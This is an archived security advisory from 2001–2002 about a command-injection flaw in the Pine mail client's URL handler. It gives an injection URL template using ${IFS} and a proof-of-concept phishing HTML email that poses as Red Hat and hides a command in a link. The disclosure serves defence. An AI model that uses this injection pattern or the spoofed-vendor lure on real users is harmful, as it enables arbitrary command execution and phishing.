Systems: Pine 4.33 (under Redhat 7.0) (Probably many others, haven't checked much) Vendors notified: Sat, 20 Oct 2001 06:50:12 +1300 (NZDT) And again: Fri, 9 Nov 2001 07:14:15 +1300 (NZDT) And again: Thu, 3 Jan 2002 08:15:55 +1300 (NZDT) Problem: URL handler allows embedded commands. May allow email viruses of the Outlook kind. Severity: Extremely Low -> Very High (Dependant on current email reading habits) Workaround: Don't view URLs from inside Pine. (ObSpam: Except for http://mp3.com/cosv/ ;]) Details: This is a similar problem to the xchat 1.4.1 URL handler vulnerability. http://www.securityfocus.com/bid/1601 In Pine, if a user selects a URL for the form http://address/'&/some/program${IFS}with${IFS}arguments&' and URL handlers are installed, they will end up with the browser open on http://address/ and /some/program with arguments will get executed. If you are reading your email as root these these commands will execute as root. (Create an alias for root to a non-privileged user instead of reading mail as root.) If you are reading your email as a non-privileged user, the impact is somewhat lower, although local exploits could be run on the computer, or Outlook style email viruses could be executed. If you don't view links given to you in Pine, the impact from this problem is non-existant. It is possible to obfuscate the URL by putting it in an HTML message such as the following. ----Begin html email---- From: Redhat Network Security <rhnsecurityat_private> To: undisclosed list <.@.> Subject: Urgent update required to PINE Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000at_private> MIME-Version: 1.0 Content-Type: TEXT/html Content-ID: <Pine.LNX.4.33.0110221214120.9618at_private> Content-Length: 389 Lines: 12 <HTML> <BODY> Urgent update:<p> PINE allows execution of arbitrary commands.<p> <a href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/"> http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/> <p> This link contains PINE update information. <p> You are advised to perform this immediately. <p> The link also contains other urgent update information. <p> </BODY> </HTML> ----End html email---- Which would appear something like ----Begin view of email---- Date: Mon, 22 Oct 2001 13:34:40 +1300 From: Redhat Network Security <rhnsecurityat_private> To: undisclosed list <.@.> Subject: Urgent update required to PINE Urgent update: PINE allows execution of arbitrary commands. http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho e-in-pine-url-handler/ This link contains PINE update information. You are advised to perform this immediately. The link also contains other urgent update information. ----End view of email---- When this link is selected to follow, Pine changes the status/menu lines to read: View selected URL "http://updates.redhat.com/update_information/urgent/r..." ? Y [Yes] U editURL N No A editApp Which appears to match the url in the email. This probably makes detection of this kind of exploit attempt harder. -- zen-parse [ A (relatively) safe way to visit http://mp3.com/cosv is to type the address into the address bar of the browser you are using. Contrary to a rumour posted several days ago, the only way I get any money from this site is through CD purchases. If you want to, visit the site and listen to the music. If you like it, you might want to buy it, or not. I hope nobody has any illusion of being tricked into visiting. ] -- ------------------------------------------------------------------------- The preceding information is confidential and may not be redistributed without explicit permission. Legal action may be taken to enforce this. If this message was posted by zen-parseat_private to a public forum it may be redistributed as long as these conditions remain attached. If you are mum or dad, this probably doesn't apply to you.
This archive was generated by hypermail 2b30 : Sat Jan 05 2002 - 17:10:11 PST